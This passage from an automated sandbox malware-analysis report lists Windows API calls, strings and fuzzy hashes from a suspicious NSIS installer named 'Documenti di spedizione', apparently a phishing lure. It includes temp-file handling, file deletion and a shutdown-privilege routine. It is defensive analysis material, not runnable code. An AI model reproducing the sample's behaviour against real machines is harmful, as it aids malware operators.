                                            • GetCommandLineA.KERNEL32(00422F20,NSIS Error), ref: 0040336D
                                            • GetModuleHandleA.KERNEL32(00000000,00429000,00000000), ref: 00403380
                                            • CharNextA.USER32(00000000,00429000,00000020), ref: 004033AB
                                            • GetTempPathA.KERNEL32(00000400,0042A400,00000000,00000020), ref: 004034A8
                                            • GetWindowsDirectoryA.KERNEL32(0042A400,000003FB), ref: 004034B9
                                            • lstrcatA.KERNEL32(0042A400,\Temp), ref: 004034C5
                                            • GetTempPathA.KERNEL32(000003FC,0042A400,0042A400,\Temp), ref: 004034D9
                                            • lstrcatA.KERNEL32(0042A400,Low), ref: 004034E1
                                            • SetEnvironmentVariableA.KERNEL32(TEMP,0042A400,0042A400,Low), ref: 004034F2
                                            • SetEnvironmentVariableA.KERNEL32(TMP,0042A400), ref: 004034FA
                                            • DeleteFileA.KERNEL32(0042A000), ref: 0040350E
                                              • Part of subcall function 00406290: GetModuleHandleA.KERNEL32(?,?,?,00403329,00000009), ref: 004062A2
                                              • Part of subcall function 00406290: GetProcAddress.KERNEL32(00000000,?), ref: 004062BD
                                            • OleUninitialize.OLE32(?), ref: 004035BC
                                            • ExitProcess.KERNEL32 ref: 004035DD
                                            • GetCurrentProcess.KERNEL32(00000028,?), ref: 004036FA
                                            • OpenProcessToken.ADVAPI32(00000000), ref: 00403701
                                            • LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00403719
                                            • AdjustTokenPrivileges.ADVAPI32(?,?,?,?,00000000,?,00000000,00000000,00000000), ref: 00403738
                                            • ExitWindowsEx.USER32(00000002,80040002), ref: 0040375C
                                            • ExitProcess.KERNEL32 ref: 0040377F
                                              • Part of subcall function 004056ED: MessageBoxIndirectA.USER32(00409230), ref: 00405748
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.3246456880.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000004.00000002.3246444105.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000004.00000002.3246470185.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000004.00000002.3246482951.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000004.00000002.3246501934.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_400000_Documenti di spedizione.jbxd
                                            Similarity
                                            • API ID: Process$Exit$EnvironmentFileHandleModulePathTempTokenVariableWindowslstrcat$AddressAdjustCharCommandCurrentDeleteDirectoryErrorIndirectInfoInitializeLineLookupMessageModeNextOpenPrivilegePrivilegesProcUninitializeValueVersionlstrlen
                                            • String ID: "$.tmp$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$~nsu
                                            • API String ID: 3329125770-3941163293
                                            • Opcode ID: e18221ddd9e48752b7ffbdf688241eb0e22038d92db6db9d705f5ccec6b49e04
                                            • Instruction ID: 987bc29005933e48b9d04248005189ae3273ffe916fb5a61461eda946c2e522c
                                            • Opcode Fuzzy Hash: e18221ddd9e48752b7ffbdf688241eb0e22038d92db6db9d705f5ccec6b49e04
                                            • Instruction Fuzzy Hash: FCC109706082816AE7216F259D49A2F3EACEF81706F44447FF481761E2CB7C9A05CB6E
                                            APIs
                                            • GetDlgItem.USER32(?,000003F9), ref: 00404AA5
                                            • GetDlgItem.USER32(?,00000408), ref: 00404AB0
                                            • GlobalAlloc.KERNEL32(00000040,?), ref: 00404AFA
                                            • LoadBitmapA.USER32(0000006E), ref: 00404B0D
                                            • SetWindowLongA.USER32(?,000000FC,00405084), ref: 00404B26
                                            • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404B3A
                                            • ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00404B4C
                                            • SendMessageA.USER32(?,00001109,00000002), ref: 00404B62
                                            • SendMessageA.USER32(?,0000111C,00000000,00000000), ref: 00404B6E
                                            • SendMessageA.USER32(?,0000111B,00000010,00000000), ref: 00404B80
                                            • DeleteObject.GDI32(00000000), ref: 00404B83
                                            • SendMessageA.USER32(?,00000143,00000000,00000000), ref: 00404BAE
                                            • SendMessageA.USER32(?,00000151,00000000,00000000), ref: 00404BBA
                                            • SendMessageA.USER32(?,00001100,00000000,?), ref: 00404C4F
                                            • SendMessageA.USER32(?,0000110A,00000003,00000000), ref: 00404C7A
                                            • SendMessageA.USER32(?,00001100,00000000,?), ref: 00404C8E
                                            • GetWindowLongA.USER32(?,000000F0), ref: 00404CBD
                                            • SetWindowLongA.USER32(?,000000F0,00000000), ref: 00404CCB
                                            • ShowWindow.USER32(?,00000005), ref: 00404CDC
                                            • SendMessageA.USER32(?,00000419,00000000,?), ref: 00404DD9
                                            • SendMessageA.USER32(?,00000147,00000000,00000000), ref: 00404E3E
                                            • SendMessageA.USER32(?,00000150,00000000,00000000), ref: 00404E53
                                            • SendMessageA.USER32(?,00000420,00000000,00000020), ref: 00404E77
                                            • SendMessageA.USER32(?,00000200,00000000,00000000), ref: 00404E97
                                            • ImageList_Destroy.COMCTL32(?), ref: 00404EAC
                                            • GlobalFree.KERNEL32(?), ref: 00404EBC
                                            • SendMessageA.USER32(?,0000014E,00000000,00000000), ref: 00404F35
                                            • SendMessageA.USER32(?,00001102,?,?), ref: 00404FDE
                                            • SendMessageA.USER32(?,0000110D,00000000,00000008), ref: 00404FED
                                            • InvalidateRect.USER32(?,00000000,00000001), ref: 0040500D
                                            • ShowWindow.USER32(?,00000000), ref: 0040505B
                                            • GetDlgItem.USER32(?,000003FE), ref: 00405066
                                            • ShowWindow.USER32(00000000), ref: 0040506D
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.3246456880.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000004.00000002.3246444105.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000004.00000002.3246470185.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000004.00000002.3246482951.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000004.00000002.3246501934.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_400000_Documenti di spedizione.jbxd
                                            Similarity
                                            • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                            • String ID: $M$N
                                            • API String ID: 1638840714-813528018
                                            • Opcode ID: ba7290f4b2f558e76718ca09df7d9ac4a37db348ff9a84ef3540181398f9072b
                                            • Instruction ID: e0cc5522092fb32f5c2674b78011ac89e49f6c9f2dab24d514a8ff43177d9d20
                                            • Opcode Fuzzy Hash: ba7290f4b2f558e76718ca09df7d9ac4a37db348ff9a84ef3540181398f9072b
                                            • Instruction Fuzzy Hash: 1E025EB0900209AFEB209F94DC85AAE7BB5FB84315F10817AF611B62E1C7799D42DF58
                                            APIs
                                            • DeleteFileA.KERNEL32(?,?,75923410,75922EE0,00000000), ref: 004057C2
                                            • lstrcatA.KERNEL32(00420D38,\*.*,00420D38,?,?,75923410,75922EE0,00000000), ref: 0040580A
                                            • lstrcatA.KERNEL32(?,00409014,?,00420D38,?,?,75923410,75922EE0,00000000), ref: 0040582B
                                            • lstrlenA.KERNEL32(?,?,00409014,?,00420D38,?,?,75923410,75922EE0,00000000), ref: 00405831
                                            • FindFirstFileA.KERNEL32(00420D38,?,?,?,00409014,?,00420D38,?,?,75923410,75922EE0,00000000), ref: 00405842
                                            • FindNextFileA.KERNEL32(00000000,00000010,000000F2,?,?,?,00000000,?,?,0000003F), ref: 004058EF
                                            • FindClose.KERNEL32(00000000), ref: 00405900
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.3246456880.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000004.00000002.3246444105.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000004.00000002.3246470185.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000004.00000002.3246482951.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000004.00000002.3246501934.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_400000_Documenti di spedizione.jbxd
                                            Similarity
                                            • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                            • String ID: 8B$\*.*
                                            • API String ID: 2035342205-1085368084
                                            • Opcode ID: ea9ce5b97ce8e4b443abb3ca9957b13dd705908b98673029f699f8bd1230974e
                                            • Instruction ID: 8d03ba635bdf6d692437a4f2007131f6bbb84493a6188974bf12e3b4770be62e
                                            • Opcode Fuzzy Hash: ea9ce5b97ce8e4b443abb3ca9957b13dd705908b98673029f699f8bd1230974e
                                            • Instruction Fuzzy Hash: 3E51AF71900A14EADF217B618C49BAF7AB8DF42724F14807BF850762D2D73C8992DE6D
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.3269014634.0000000038CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 38CF0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_38cf0000_Documenti di spedizione.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: $]q$$]q$$]q$$]q$$]q$$]q$$]q$$]q$$]q$$]q
                                            • API String ID: 0-2843079600
                                            • Opcode ID: ecc85f59a338d2d70e48287c600abda107eb9ed31b893c07a3f98937ef8fc1be
                                            • Instruction ID: a1ec182190e25de96c1095a87a380763906a272b8e1acebbbc5be9c4e85ab978
                                            • Opcode Fuzzy Hash: ecc85f59a338d2d70e48287c600abda107eb9ed31b893c07a3f98937ef8fc1be
                                            • Instruction Fuzzy Hash: 0D123C34A00259CFEB54DF79C990A9DB7B2BF88304F60897AD409AB355DB319D46CF50
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.3246456880.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000004.00000002.3246444105.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000004.00000002.3246470185.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000004.00000002.3246482951.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000004.00000002.3246501934.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_400000_Documenti di spedizione.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: e78d97ed3c230bfcbd776d1da080b0f670dc0f56a58da5166f9bdd2003ef958d
                                            • Instruction ID: 395035d2fa7d2bfd2a07fc8d885f942395c55dc3dc65efbd6096f39d55049081
                                            • Opcode Fuzzy Hash: e78d97ed3c230bfcbd776d1da080b0f670dc0f56a58da5166f9bdd2003ef958d
                                            • Instruction Fuzzy Hash: 18F16671D00229CBCF28CFA8C8946ADBBB1FF44305F25856ED856BB281D7385A96DF44
                                            APIs
                                            • GetDlgItem.USER32(?,00000403), ref: 004052AD
                                            • GetDlgItem.USER32(?,000003EE), ref: 004052BC
                                            • GetClientRect.USER32(?,?), ref: 004052F9
                                            • GetSystemMetrics.USER32(00000002), ref: 00405300
                                            • SendMessageA.USER32(?,0000101B,00000000,?), ref: 00405321
                                            • SendMessageA.USER32(?,00001036,00004000,00004000), ref: 00405332
                                            • SendMessageA.USER32(?,00001001,00000000,?), ref: 00405345
                                            • SendMessageA.USER32(?,00001026,00000000,?), ref: 00405353
                                            • SendMessageA.USER32(?,00001024,00000000,?), ref: 00405366
                                            • ShowWindow.USER32(00000000,?,0000001B,?), ref: 00405388
                                            • ShowWindow.USER32(?,00000008), ref: 0040539C
                                            • GetDlgItem.USER32(?,000003EC), ref: 004053BD
                                            • SendMessageA.USER32(00000000,00000401,00000000,75300000), ref: 004053CD
                                            • SendMessageA.USER32(00000000,00000409,00000000,?), ref: 004053E6
                                            • SendMessageA.USER32(00000000,00002001,00000000,?), ref: 004053F2
                                            • GetDlgItem.USER32(?,000003F8), ref: 004052CB
                                              • Part of subcall function 00404111: SendMessageA.USER32(00000028,?,00000001,00403F42), ref: 0040411F
                                            • GetDlgItem.USER32(?,000003EC), ref: 0040540E
                                            • CreateThread.KERNEL32(00000000,00000000,Function_000051E2,00000000), ref: 0040541C
                                            • CloseHandle.KERNEL32(00000000), ref: 00405423
                                            • ShowWindow.USER32(00000000), ref: 00405446
                                            • ShowWindow.USER32(?,00000008), ref: 0040544D
                                            • ShowWindow.USER32(00000008), ref: 00405493
                                            • SendMessageA.USER32(?,00001004,00000000,00000000), ref: 004054C7
                                            • CreatePopupMenu.USER32 ref: 004054D8
                                            • AppendMenuA.USER32(00000000,00000000,00000001,00000000), ref: 004054ED
                                            • GetWindowRect.USER32(?,000000FF), ref: 0040550D
                                            • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 00405526
                                            • SendMessageA.USER32(?,0000102D,00000000,?), ref: 00405562
                                            • OpenClipboard.USER32(00000000), ref: 00405572
                                            • EmptyClipboard.USER32 ref: 00405578
                                            • GlobalAlloc.KERNEL32(00000042,?), ref: 00405581
                                            • GlobalLock.KERNEL32(00000000), ref: 0040558B
                                            • SendMessageA.USER32(?,0000102D,00000000,?), ref: 0040559F
                                            • GlobalUnlock.KERNEL32(00000000), ref: 004055B8
                                            • SetClipboardData.USER32(00000001,00000000), ref: 004055C3
                                            • CloseClipboard.USER32 ref: 004055C9
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.3246456880.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000004.00000002.3246444105.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000004.00000002.3246470185.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000004.00000002.3246482951.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000004.00000002.3246501934.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_400000_Documenti di spedizione.jbxd
                                            Similarity
                                            • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                                            • String ID:
                                            • API String ID: 590372296-0
                                            • Opcode ID: c64a89a41c0802a74bba5a78dd280d07ec270940df5a5324a2dbd363d8ad6a15
                                            • Instruction ID: e0dc4773203ce2f112709eab9a11bfc184f4d069c8d5349c47d5b80479340f4b
                                            • Opcode Fuzzy Hash: c64a89a41c0802a74bba5a78dd280d07ec270940df5a5324a2dbd363d8ad6a15
                                            • Instruction Fuzzy Hash: 10A148B1900208BFDF119F60DD89AAE7BB9FB48355F00407AFA01B61A0C7B55E51DF69
                                            APIs
                                            • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403C45
                                            • ShowWindow.USER32(?), ref: 00403C62
                                            • DestroyWindow.USER32 ref: 00403C76
                                            • SetWindowLongA.USER32(?,00000000,00000000), ref: 00403C92
                                            • GetDlgItem.USER32(?,?), ref: 00403CB3
                                            • SendMessageA.USER32(00000000,000000F3,00000000,00000000), ref: 00403CC7
                                            • IsWindowEnabled.USER32(00000000), ref: 00403CCE
                                            • GetDlgItem.USER32(?,00000001), ref: 00403D7C
                                            • GetDlgItem.USER32(?,00000002), ref: 00403D86
                                            • SetClassLongA.USER32(?,000000F2,?), ref: 00403DA0
                                            • SendMessageA.USER32(0000040F,00000000,00000001,?), ref: 00403DF1
                                            • GetDlgItem.USER32(?,00000003), ref: 00403E97
                                            • ShowWindow.USER32(00000000,?), ref: 00403EB8
                                            • EnableWindow.USER32(?,?), ref: 00403ECA
                                            • EnableWindow.USER32(?,?), ref: 00403EE5
                                            • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00403EFB
                                            • EnableMenuItem.USER32(00000000), ref: 00403F02
                                            • SendMessageA.USER32(?,000000F4,00000000,00000001), ref: 00403F1A
                                            • SendMessageA.USER32(?,00000401,00000002,00000000), ref: 00403F2D
                                            • lstrlenA.KERNEL32(0041FD30,?,0041FD30,00422F20), ref: 00403F56
                                            • SetWindowTextA.USER32(?,0041FD30), ref: 00403F65
                                            • ShowWindow.USER32(?,0000000A), ref: 00404099
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.3246456880.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000004.00000002.3246444105.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000004.00000002.3246470185.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000004.00000002.3246482951.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000004.00000002.3246501934.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_400000_Documenti di spedizione.jbxd
                                            Similarity
                                            • API ID: Window$Item$MessageSend$EnableShow$LongMenu$ClassDestroyEnabledSystemTextlstrlen
                                            • String ID:
                                            • API String ID: 184305955-0
                                            • Opcode ID: f52cdbaf3123b7cbd9944adc9014d9948be0515c381cedadf67d37a6be0de08c
                                            • Instruction ID: 2eb83949b6bd8974722fa043abbaf2d62199bae10e2b8edc7fb886fd11b27e7e
                                            • Opcode Fuzzy Hash: f52cdbaf3123b7cbd9944adc9014d9948be0515c381cedadf67d37a6be0de08c
                                            • Instruction Fuzzy Hash: 3EC1F2B1604201BBDB20AF61EE84E2B3ABCFB84305F51053EF611B11E1C7799842EB5E
                                            APIs
                                            • CheckDlgButton.USER32(00000000,-0000040A,00000001), ref: 004042B0
                                            • GetDlgItem.USER32(00000000,000003E8), ref: 004042C4
                                            • SendMessageA.USER32(00000000,0000045B,00000001,00000000), ref: 004042E2
                                            • GetSysColor.USER32(?), ref: 004042F3
                                            • SendMessageA.USER32(00000000,00000443,00000000,?), ref: 00404302
                                            • SendMessageA.USER32(00000000,00000445,00000000,04010000), ref: 00404311
                                            • lstrlenA.KERNEL32(?), ref: 00404314
                                            • SendMessageA.USER32(00000000,00000435,00000000,00000000), ref: 00404323
                                            • SendMessageA.USER32(00000000,00000449,?,00000110), ref: 00404338
                                            • GetDlgItem.USER32(?,0000040A), ref: 0040439A
                                            • SendMessageA.USER32(00000000), ref: 0040439D
                                            • GetDlgItem.USER32(?,000003E8), ref: 004043C8
                                            • SendMessageA.USER32(00000000,0000044B,00000000,00000201), ref: 00404408
                                            • LoadCursorA.USER32(00000000,00007F02), ref: 00404417
                                            • SetCursor.USER32(00000000), ref: 00404420
                                            • ShellExecuteA.SHELL32(0000070B,open,004226C0,00000000,00000000,00000001), ref: 00404433
                                            • LoadCursorA.USER32(00000000,00007F00), ref: 00404440
                                            • SetCursor.USER32(00000000), ref: 00404443
                                            • SendMessageA.USER32(00000111,00000001,00000000), ref: 0040446F
                                            • SendMessageA.USER32(00000010,00000000,00000000), ref: 00404483
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.3246456880.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000004.00000002.3246444105.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000004.00000002.3246470185.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000004.00000002.3246482951.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000004.00000002.3246501934.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_400000_Documenti di spedizione.jbxd
                                            Similarity
                                            • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorExecuteShelllstrlen
                                            • String ID: N$open
                                            • API String ID: 3615053054-904208323
                                            • Opcode ID: e76cc1a0ba7ef7f86ae8e4ee464b0340797726a5bea064de8fa3a19247962d01
                                            • Instruction ID: 93f755629d35b640548b5af6b7c61ab120d2ba211fed136cde477a70902604c8
                                            • Opcode Fuzzy Hash: e76cc1a0ba7ef7f86ae8e4ee464b0340797726a5bea064de8fa3a19247962d01
                                            • Instruction Fuzzy Hash: 5D61A3B1A40209BFEB109F61DC45F6A7B69FB84714F10803AFB057A2D1C7B8A951CF99
                                            APIs
                                              • Part of subcall function 00406290: GetModuleHandleA.KERNEL32(?,?,?,00403329,00000009), ref: 004062A2
                                              • Part of subcall function 00406290: GetProcAddress.KERNEL32(00000000,?), ref: 004062BD
                                            • lstrcatA.KERNEL32(0042A000,0041FD30,80000001,Control Panel\Desktop\ResourceLocale,00000000,0041FD30,00000000,00000002,75923410,0042A400,00429000,00000000), ref: 004038F2
                                            • lstrlenA.KERNEL32(004226C0,?,?,?,004226C0,00000000,00429400,0042A000,0041FD30,80000001,Control Panel\Desktop\ResourceLocale,00000000,0041FD30,00000000,00000002,75923410), ref: 00403967
                                            • lstrcmpiA.KERNEL32(?,.exe), ref: 0040397A
                                            • GetFileAttributesA.KERNEL32(004226C0), ref: 00403985
                                            • LoadImageA.USER32(00000067,00000001,00000000,00000000,00008040,00429400), ref: 004039CE
                                              • Part of subcall function 00405E55: wsprintfA.USER32 ref: 00405E62
                                            • RegisterClassA.USER32(00422EC0), ref: 00403A0B
                                            • SystemParametersInfoA.USER32(00000030,00000000,?,00000000), ref: 00403A23
                                            • CreateWindowExA.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403A58
                                            • ShowWindow.USER32(00000005,00000000), ref: 00403A8E
                                            • GetClassInfoA.USER32(00000000,RichEdit20A,00422EC0), ref: 00403ABA
                                            • GetClassInfoA.USER32(00000000,RichEdit,00422EC0), ref: 00403AC7
                                            • RegisterClassA.USER32(00422EC0), ref: 00403AD0
                                            • DialogBoxParamA.USER32(?,00000000,00403C09,00000000), ref: 00403AEF
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.3246456880.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000004.00000002.3246444105.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000004.00000002.3246470185.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000004.00000002.3246482951.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000004.00000002.3246501934.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_400000_Documenti di spedizione.jbxd
                                            Similarity
                                            • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                            • String ID: .DEFAULT\Control Panel\International$.exe$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20A$_Nb
                                            • API String ID: 1975747703-2904746566
                                            • Opcode ID: acb9e1483f64e376554eea66f981f1d844e256060aa5afb508f73614915c59b6
                                            • Instruction ID: 29345e8072be8e75dc90901d6125d60d13300850aec60374d900494af90ecb47
                                            • Opcode Fuzzy Hash: acb9e1483f64e376554eea66f981f1d844e256060aa5afb508f73614915c59b6
                                            • Instruction Fuzzy Hash: 8161A4B06442407ED620AF65AD45F373A6CEB8474AF40447FF945B22E2C6BCAD029A3D
                                            APIs
                                            • DefWindowProcA.USER32(?,00000046,?,?), ref: 0040102C
                                            • BeginPaint.USER32(?,?), ref: 00401047
                                            • GetClientRect.USER32(?,?), ref: 0040105B
                                            • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                            • FillRect.USER32(00000000,?,00000000), ref: 004010E4
                                            • DeleteObject.GDI32(?), ref: 004010ED
                                            • CreateFontIndirectA.GDI32(?), ref: 00401105
                                            • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                                            • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                            • SelectObject.GDI32(00000000,?), ref: 00401140
                                            • DrawTextA.USER32(00000000,00422F20,000000FF,00000010,00000820), ref: 00401156
                                            • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                            • DeleteObject.GDI32(?), ref: 00401165
                                            • EndPaint.USER32(?,?), ref: 0040116E
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.3246456880.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000004.00000002.3246444105.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000004.00000002.3246470185.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000004.00000002.3246482951.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000004.00000002.3246501934.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_400000_Documenti di spedizione.jbxd
                                            Similarity
                                            • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                            • String ID: F
                                            • API String ID: 941294808-1304234792
                                            • Opcode ID: 7c104425433eee9aa72c8594e5c9845c7e8c7dbb4814f5ad4226ea4ba1dd0cf1
                                            • Instruction ID: f6076547c65416f673289c9e9aa760257b54fe90aa12de16c0a46004740ece36
                                            • Opcode Fuzzy Hash: 7c104425433eee9aa72c8594e5c9845c7e8c7dbb4814f5ad4226ea4ba1dd0cf1
                                            • Instruction Fuzzy Hash: C2419B71804249AFCF058FA4CD459AFBBB9FF45310F00812AF961AA1A0C738EA50DFA5
                                            APIs
                                            • lstrcpyA.KERNEL32(00421AC0,NUL,?,00000000,?,00000000,00405DD3,?,?), ref: 00405C4F
                                            • CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,00000000,00405DD3,?,?), ref: 00405C73
                                            • GetShortPathNameA.KERNEL32(?,00421AC0,00000400), ref: 00405C7C
                                              • Part of subcall function 00405ACF: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405D2C,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405ADF
                                              • Part of subcall function 00405ACF: lstrlenA.KERNEL32(00000000,?,00000000,00405D2C,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405B11
                                            • GetShortPathNameA.KERNEL32(00421EC0,00421EC0,00000400), ref: 00405C99
                                            • wsprintfA.USER32 ref: 00405CB7
                                            • GetFileSize.KERNEL32(00000000,00000000,00421EC0,C0000000,00000004,00421EC0,?,?,?,?,?), ref: 00405CF2
                                            • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 00405D01
                                            • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405D39
                                            • SetFilePointer.KERNEL32(004093C8,00000000,00000000,00000000,00000000,004216C0,00000000,-0000000A,004093C8,00000000,[Rename],00000000,00000000,00000000), ref: 00405D8F
                                            • GlobalFree.KERNEL32(00000000), ref: 00405DA0
                                            • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00405DA7
                                              • Part of subcall function 00405B6A: GetFileAttributesA.KERNEL32(00000003,00402D8D,0042AC00,80000000,00000003), ref: 00405B6E
                                              • Part of subcall function 00405B6A: CreateFileA.KERNEL32(?,?,00000001,00000000,?,00000001,00000000), ref: 00405B90
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.3246456880.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000004.00000002.3246444105.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000004.00000002.3246470185.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000004.00000002.3246482951.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000004.00000002.3246501934.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_400000_Documenti di spedizione.jbxd
                                            Similarity
                                            • API ID: File$CloseGlobalHandleNamePathShortlstrcpylstrlen$AllocAttributesCreateFreePointerSizewsprintf
                                            • String ID: %s=%s$NUL$[Rename]
                                            • API String ID: 222337774-4148678300
                                            • Opcode ID: 2e3f1d5478f9f0c6b3014663fcb7d6cbfaa562a2a519d3499902ae05c7337469
                                            • Instruction ID: 58b8e60db813422e8a8f05baf12fe1cb7cc397f7baf35d3febd204dd1aeecf15
                                            • Opcode Fuzzy Hash: 2e3f1d5478f9f0c6b3014663fcb7d6cbfaa562a2a519d3499902ae05c7337469
                                            • Instruction Fuzzy Hash: D031C271A04B596BD2202B219D49F6B3A6CDF85754F18003BF901F62D2E67CA8018EAD
                                            APIs
                                            • GetDlgItem.USER32(?,000003FB), ref: 00404569
                                            • SetWindowTextA.USER32(00000000,?), ref: 00404593
